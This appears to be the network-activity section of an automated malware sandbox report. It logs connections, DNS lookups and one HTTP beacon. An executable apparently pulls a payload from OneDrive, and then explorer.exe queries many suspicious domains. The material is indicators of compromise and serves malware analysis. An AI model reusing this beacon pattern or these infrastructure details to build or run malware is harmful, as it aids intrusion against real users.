Aug 8, 2022 20:12:29.711433887 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921008110 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921055079 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921165943 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.921196938 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921258926 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921264887 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.921291113 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921360016 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.921380043 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.921390057 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921473980 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921587944 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921675920 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.921699047 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.921716928 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.921798944 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.923412085 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.923712969 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.923774004 CEST | 443 | 49746 | 13.107.43.12 | 192.168.2.3
Aug 8, 2022 20:12:29.923821926 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:29.923847914 CEST | 49746 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:30.650996923 CEST | 49748 | 443 | 192.168.2.3 | 13.107.43.12
Aug 8, 2022 20:12:30.651082993 CEST | 443 | 49748 | 13.107.43.12 | 192.168.2.3
                                                                                                Aug 8, 2022 20:12:30.651180983 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.651906967 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.651938915 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:30.742676973 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:30.742773056 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.743453979 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.743469954 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:30.748049974 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.748069048 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014241934 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014286995 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014365911 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.014394045 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014421940 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014453888 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.014473915 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.014498949 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.014518976 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.018021107 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.156469107 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.156600952 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.156615019 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.156641960 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.156713963 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.156737089 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.156761885 CEST4434974813.107.43.12192.168.2.3
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Aug 8, 2022 20:12:06.922441006 CEST  49316        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:12:08.069134951 CEST  56417        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:12:28.656106949 CEST  55923        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:12:29.444283962 CEST  57723        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:12:41.664526939 CEST  58116        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:12:42.633210897 CEST  57421        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:13.530627966 CEST  49723        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:13.662398100 CEST  53           49723      8.8.8.8       192.168.2.3
Aug 8, 2022 20:14:18.930552006 CEST  52581        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:18.961222887 CEST  53           52581      8.8.8.8       192.168.2.3
Aug 8, 2022 20:14:24.016206980 CEST  50152        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:24.035969973 CEST  53           50152      8.8.8.8       192.168.2.3
Aug 8, 2022 20:14:29.220875025 CEST  52427        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:29.246108055 CEST  53           52427      8.8.8.8       192.168.2.3
Aug 8, 2022 20:14:34.659301996 CEST  62724        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:34.687539101 CEST  53           62724      8.8.8.8       192.168.2.3
Aug 8, 2022 20:14:39.783365965 CEST  64941        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:39.852020979 CEST  53           64941      8.8.8.8       192.168.2.3
Aug 8, 2022 20:14:44.908478022 CEST  55403        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:45.086206913 CEST  53           55403      8.8.8.8       192.168.2.3
Aug 8, 2022 20:14:50.639390945 CEST  61877        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:14:50.809159994 CEST  53           61877      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:01.676448107 CEST  64412        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:15:01.709094048 CEST  53           64412      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:06.960392952 CEST  51779        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:15:07.235305071 CEST  53           51779      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:12.251024008 CEST  50608        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:15:12.281902075 CEST  53           50608      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:34.505660057 CEST  54205        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:15:34.530457973 CEST  53           54205      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:39.645056009 CEST  62756        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:15:39.959163904 CEST  53           62756      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:54.742095947 CEST  58497        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:15:54.761399984 CEST  53           58497      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:54.765111923 CEST  62701        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:15:54.796822071 CEST  53           62701      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:54.800062895 CEST  53524        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:15:54.858072996 CEST  53           53524      8.8.8.8       192.168.2.3
Aug 8, 2022 20:15:59.877633095 CEST  58561        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:00.858776093 CEST  58561        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:01.909074068 CEST  58561        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:03.956007004 CEST  58561        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:04.895198107 CEST  53           58561      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:05.042470932 CEST  61555        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:05.876121044 CEST  53           58561      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:06.061783075 CEST  61555        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:06.926480055 CEST  53           58561      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:07.413911104 CEST  61555        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:08.973356962 CEST  53           58561      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:09.431735039 CEST  61555        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:10.061058998 CEST  53           61555      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:10.081501007 CEST  64433        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:11.081312895 CEST  53           61555      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:11.094490051 CEST  64433        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:12.109828949 CEST  64433        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:12.433202028 CEST  53           61555      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:14.125829935 CEST  64433        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:14.451484919 CEST  53           61555      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:15.101099968 CEST  53           64433      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:16.113787889 CEST  53           64433      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:17.129256964 CEST  53           64433      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:19.145693064 CEST  53           64433      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:21.767999887 CEST  54096        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:21.797375917 CEST  53           54096      8.8.8.8       192.168.2.3
Aug 8, 2022 20:16:26.877679110 CEST  57829        53         192.168.2.3   8.8.8.8
Aug 8, 2022 20:16:26.919265985 CEST  53           57829      8.8.8.8       192.168.2.3
Timestamp                            Source IP    Dest IP  Checksum  Code                Type
Aug 8, 2022 20:16:05.876243114 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Aug 8, 2022 20:16:06.926682949 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Aug 8, 2022 20:16:08.973506927 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Aug 8, 2022 20:16:11.081469059 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Aug 8, 2022 20:16:12.433291912 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Aug 8, 2022 20:16:14.451654911 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Aug 8, 2022 20:16:16.113898039 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Aug 8, 2022 20:16:17.129350901 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Aug 8, 2022 20:16:19.146061897 CEST  192.168.2.3  8.8.8.8  cff3      (Port unreachable)  Destination Unreachable
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                            Type            Class
Aug 8, 2022 20:12:06.922441006 CEST  192.168.2.3  8.8.8.8  0x669c    Standard query (0)  onedrive.live.com               A (IP address)  IN (0x0001)
Aug 8, 2022 20:12:08.069134951 CEST  192.168.2.3  8.8.8.8  0x603a    Standard query (0)  2q5ira.ph.files.1drv.com        A (IP address)  IN (0x0001)
Aug 8, 2022 20:12:28.656106949 CEST  192.168.2.3  8.8.8.8  0xff47    Standard query (0)  onedrive.live.com               A (IP address)  IN (0x0001)
Aug 8, 2022 20:12:29.444283962 CEST  192.168.2.3  8.8.8.8  0x29c9    Standard query (0)  2q5ira.ph.files.1drv.com        A (IP address)  IN (0x0001)
Aug 8, 2022 20:12:41.664526939 CEST  192.168.2.3  8.8.8.8  0x1b23    Standard query (0)  onedrive.live.com               A (IP address)  IN (0x0001)
Aug 8, 2022 20:12:42.633210897 CEST  192.168.2.3  8.8.8.8  0x7e06    Standard query (0)  2q5ira.ph.files.1drv.com        A (IP address)  IN (0x0001)
Aug 8, 2022 20:14:13.530627966 CEST  192.168.2.3  8.8.8.8  0x9a81    Standard query (0)  www.meigsbuilds.online          A (IP address)  IN (0x0001)
Aug 8, 2022 20:14:18.930552006 CEST  192.168.2.3  8.8.8.8  0x198c    Standard query (0)  www.naturathome.info            A (IP address)  IN (0x0001)
Aug 8, 2022 20:14:24.016206980 CEST  192.168.2.3  8.8.8.8  0x3325    Standard query (0)  www.nutricognition.com          A (IP address)  IN (0x0001)
Aug 8, 2022 20:14:29.220875025 CEST  192.168.2.3  8.8.8.8  0xba55    Standard query (0)  www.designgamagazine.com        A (IP address)  IN (0x0001)
Aug 8, 2022 20:14:34.659301996 CEST  192.168.2.3  8.8.8.8  0xb484    Standard query (0)  www.kidsfundoor.com             A (IP address)  IN (0x0001)
Aug 8, 2022 20:14:39.783365965 CEST  192.168.2.3  8.8.8.8  0x182a    Standard query (0)  www.choonchain.com              A (IP address)  IN (0x0001)
Aug 8, 2022 20:14:44.908478022 CEST  192.168.2.3  8.8.8.8  0x5e17    Standard query (0)  www.empireapothecary.com        A (IP address)  IN (0x0001)
Aug 8, 2022 20:14:50.639390945 CEST  192.168.2.3  8.8.8.8  0xada9    Standard query (0)  www.moneytaoism.com             A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:01.676448107 CEST  192.168.2.3  8.8.8.8  0x6dab    Standard query (0)  www.shopwithtrooperdavecom.com  A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:06.960392952 CEST  192.168.2.3  8.8.8.8  0x64cc    Standard query (0)  www.6111.site                   A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:12.251024008 CEST  192.168.2.3  8.8.8.8  0xe8d8    Standard query (0)  www.trendiddas.com              A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:34.505660057 CEST  192.168.2.3  8.8.8.8  0xe49c    Standard query (0)  www.trisuaka.xyz                A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:39.645056009 CEST  192.168.2.3  8.8.8.8  0x27cf    Standard query (0)  www.nomaxdic.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:54.742095947 CEST  192.168.2.3  8.8.8.8  0xb49c    Standard query (0)  www.gografic.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:54.765111923 CEST  192.168.2.3  8.8.8.8  0x9757    Standard query (0)  www.gografic.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:54.800062895 CEST  192.168.2.3  8.8.8.8  0x1e0     Standard query (0)  www.gografic.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:15:59.877633095 CEST  192.168.2.3  8.8.8.8  0x762d    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:00.858776093 CEST  192.168.2.3  8.8.8.8  0x762d    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:01.909074068 CEST  192.168.2.3  8.8.8.8  0x762d    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:03.956007004 CEST  192.168.2.3  8.8.8.8  0x762d    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:05.042470932 CEST  192.168.2.3  8.8.8.8  0x851d    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:06.061783075 CEST  192.168.2.3  8.8.8.8  0x851d    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:07.413911104 CEST  192.168.2.3  8.8.8.8  0x851d    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:09.431735039 CEST  192.168.2.3  8.8.8.8  0x851d    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:10.081501007 CEST  192.168.2.3  8.8.8.8  0xf5ea    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:11.094490051 CEST  192.168.2.3  8.8.8.8  0xf5ea    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:12.109828949 CEST  192.168.2.3  8.8.8.8  0xf5ea    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:14.125829935 CEST  192.168.2.3  8.8.8.8  0xf5ea    Standard query (0)  www.huangse5.com                A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:21.767999887 CEST  192.168.2.3  8.8.8.8  0xbc84    Standard query (0)  www.wellkept.info               A (IP address)  IN (0x0001)
Aug 8, 2022 20:16:26.877679110 CEST  192.168.2.3  8.8.8.8  0x59a2    Standard query (0)  www.forummind.com               A (IP address)  IN (0x0001)
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                            CName                                 Address         Type                    Class
Aug 8, 2022 20:12:06.958794117 CEST  8.8.8.8    192.168.2.3  0x669c    No error (0)    onedrive.live.com               odc-web-geo.onedrive.akadns.net       -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:12:06.958794117 CEST  8.8.8.8    192.168.2.3  0x669c    No error (0)    l-0004.l-dc-msedge.net          -                                     13.107.43.13    A (IP address)          IN (0x0001)
Aug 8, 2022 20:12:08.145390987 CEST  8.8.8.8    192.168.2.3  0x603a    No error (0)    2q5ira.ph.files.1drv.com        ph-files.fe.1drv.com                  -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:12:08.145390987 CEST  8.8.8.8    192.168.2.3  0x603a    No error (0)    ph-files.fe.1drv.com            odc-ph-files-geo.onedrive.akadns.net  -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:12:28.679950953 CEST  8.8.8.8    192.168.2.3  0xff47    No error (0)    onedrive.live.com               odc-web-geo.onedrive.akadns.net       -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:12:29.500751019 CEST  8.8.8.8    192.168.2.3  0x29c9    No error (0)    2q5ira.ph.files.1drv.com        ph-files.fe.1drv.com                  -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:12:29.500751019 CEST  8.8.8.8    192.168.2.3  0x29c9    No error (0)    ph-files.fe.1drv.com            odc-ph-files-geo.onedrive.akadns.net  -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:12:29.500751019 CEST  8.8.8.8    192.168.2.3  0x29c9    No error (0)    l-0003.l-dc-msedge.net          -                                     13.107.43.12    A (IP address)          IN (0x0001)
Aug 8, 2022 20:12:41.684041977 CEST  8.8.8.8    192.168.2.3  0x1b23    No error (0)    onedrive.live.com               odc-web-geo.onedrive.akadns.net       -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:12:41.684041977 CEST  8.8.8.8    192.168.2.3  0x1b23    No error (0)    l-0004.l-dc-msedge.net          -                                     13.107.43.13    A (IP address)          IN (0x0001)
Aug 8, 2022 20:12:42.675123930 CEST  8.8.8.8    192.168.2.3  0x7e06    No error (0)    2q5ira.ph.files.1drv.com        ph-files.fe.1drv.com                  -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:12:42.675123930 CEST  8.8.8.8    192.168.2.3  0x7e06    No error (0)    ph-files.fe.1drv.com            odc-ph-files-geo.onedrive.akadns.net  -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:14:13.662398100 CEST  8.8.8.8    192.168.2.3  0x9a81    No error (0)    www.meigsbuilds.online          -                                     209.17.116.163  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:18.961222887 CEST  8.8.8.8    192.168.2.3  0x198c    No error (0)    www.naturathome.info            naturathome.info                      -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:14:18.961222887 CEST  8.8.8.8    192.168.2.3  0x198c    No error (0)    naturathome.info                -                                     81.169.145.158  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:24.035969973 CEST  8.8.8.8    192.168.2.3  0x3325    No error (0)    www.nutricognition.com          nutricognition.com                    -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:14:24.035969973 CEST  8.8.8.8    192.168.2.3  0x3325    No error (0)    nutricognition.com              -                                     34.102.136.180  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:29.246108055 CEST  8.8.8.8    192.168.2.3  0xba55    No error (0)    www.designgamagazine.com        parkingpage.namecheap.com             -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:14:29.246108055 CEST  8.8.8.8    192.168.2.3  0xba55    No error (0)    parkingpage.namecheap.com       -                                     198.54.117.218  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:29.246108055 CEST  8.8.8.8    192.168.2.3  0xba55    No error (0)    parkingpage.namecheap.com       -                                     198.54.117.215  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:29.246108055 CEST  8.8.8.8    192.168.2.3  0xba55    No error (0)    parkingpage.namecheap.com       -                                     198.54.117.210  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:29.246108055 CEST  8.8.8.8    192.168.2.3  0xba55    No error (0)    parkingpage.namecheap.com       -                                     198.54.117.217  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:29.246108055 CEST  8.8.8.8    192.168.2.3  0xba55    No error (0)    parkingpage.namecheap.com       -                                     198.54.117.212  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:29.246108055 CEST  8.8.8.8    192.168.2.3  0xba55    No error (0)    parkingpage.namecheap.com       -                                     198.54.117.216  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:29.246108055 CEST  8.8.8.8    192.168.2.3  0xba55    No error (0)    parkingpage.namecheap.com       -                                     198.54.117.211  A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:34.687539101 CEST  8.8.8.8    192.168.2.3  0xb484    No error (0)    www.kidsfundoor.com             kidsfundoor.com                       -               CNAME (Canonical name)  IN (0x0001)
Aug 8, 2022 20:14:34.687539101 CEST  8.8.8.8    192.168.2.3  0xb484    No error (0)    kidsfundoor.com                 -                                     2.57.90.16      A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:39.852020979 CEST  8.8.8.8    192.168.2.3  0x182a    Name error (3)  www.choonchain.com              none                                  none            A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:45.086206913 CEST  8.8.8.8    192.168.2.3  0x5e17    No error (0)    www.empireapothecary.com        -                                     154.55.180.56   A (IP address)          IN (0x0001)
Aug 8, 2022 20:14:50.809159994 CEST  8.8.8.8    192.168.2.3  0xada9    No error (0)    www.moneytaoism.com             -                                     156.226.60.131  A (IP address)          IN (0x0001)
Aug 8, 2022 20:15:01.709094048 CEST  8.8.8.8    192.168.2.3  0x6dab    Name error (3)  www.shopwithtrooperdavecom.com  none                                  none            A (IP address)          IN (0x0001)
                                                                                                Aug 8, 2022 20:15:07.235305071 CEST8.8.8.8192.168.2.30x64ccName error (3)www.6111.sitenonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:12.281902075 CEST8.8.8.8192.168.2.30xe8d8No error (0)www.trendiddas.com5.183.8.187A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:34.530457973 CEST8.8.8.8192.168.2.30xe49cNo error (0)www.trisuaka.xyz188.114.97.3A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:34.530457973 CEST8.8.8.8192.168.2.30xe49cNo error (0)www.trisuaka.xyz188.114.96.3A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:39.959163904 CEST8.8.8.8192.168.2.30x27cfNo error (0)www.nomaxdic.com38.54.163.57A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.761399984 CEST8.8.8.8192.168.2.30xb49cName error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.796822071 CEST8.8.8.8192.168.2.30x9757Name error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:15:54.858072996 CEST8.8.8.8192.168.2.30x1e0Name error (3)www.gografic.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:04.895198107 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:05.876121044 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:06.926480055 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:08.973356962 CEST8.8.8.8192.168.2.30x762dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:10.061058998 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:11.081312895 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:12.433202028 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:14.451484919 CEST8.8.8.8192.168.2.30x851dServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:15.101099968 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:16.113787889 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:17.129256964 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:19.145693064 CEST8.8.8.8192.168.2.30xf5eaServer failure (2)www.huangse5.comnonenoneA (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)www.wellkept.infowellkept.infoCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)wellkept.info15.197.142.173A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:21.797375917 CEST8.8.8.8192.168.2.30xbc84No error (0)wellkept.info3.33.152.147A (IP address)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:26.919265985 CEST8.8.8.8192.168.2.30x59a2No error (0)www.forummind.comforummind.comCNAME (Canonical name)IN (0x0001)
                                                                                                Aug 8, 2022 20:16:26.919265985 CEST8.8.8.8192.168.2.30x59a2No error (0)forummind.com35.244.105.10A (IP address)IN (0x0001)
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49728 | 13.107.43.13 | 443 | C:\Users\user\Desktop\TR0627729920002.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49737 | 13.107.43.13 | 443 | C:\Users\user\Desktop\TR0627729920002.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49850 | 2.57.90.16 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 8, 2022 20:14:34.726453066 CEST | 10084 | OUT | GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1
Host: www.kidsfundoor.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Aug 8, 2022 20:14:34.763842106 CEST | 10084 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 08 Aug 2022 18:14:34 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
